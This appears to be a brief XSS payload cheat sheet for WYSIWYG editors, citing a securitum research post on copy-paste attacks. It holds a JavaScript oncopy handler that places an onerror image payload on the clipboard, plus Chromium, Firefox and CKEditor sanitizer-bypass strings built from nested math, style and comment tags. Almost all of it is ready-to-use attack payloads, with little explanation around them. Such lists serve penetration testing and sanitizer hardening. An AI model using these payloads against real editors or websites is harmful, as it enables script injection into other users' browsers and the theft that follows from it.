WYSIWYG XSS Payloads
Post
https://research.securitum.com/the-curious-case-of-copy-paste/
Payloads
Clipboard basic
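// Intercept the copy event and put custom HTML on the clipboard in place of the selection.
document.oncopy = event => {
    // Cancel the default copy so the data set below is what lands on the clipboard.
    event.preventDefault();
    event.clipboardData.setData('text/html', '<img src onerror=alert(1)>');
};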
Chromium
(start)
a<math>b<xss style=display:block>c<style>d<a title="</style><img src onerror=alert(1)>">e
(end)
Copy me => (start) a
Firefox
(start)
<style>
@import'';
@font-face { font-family: 'ab<\/style><img src onerror=alert(1)>'}
</style>
(end)
Copy me => (start)
(end)
CKEditor
(start)
A<!--{ce_protected}{C}%3C!%2D%2D%20comment%20%2D%2D%3E-->B
(end)
Copy me => (start) AB (end)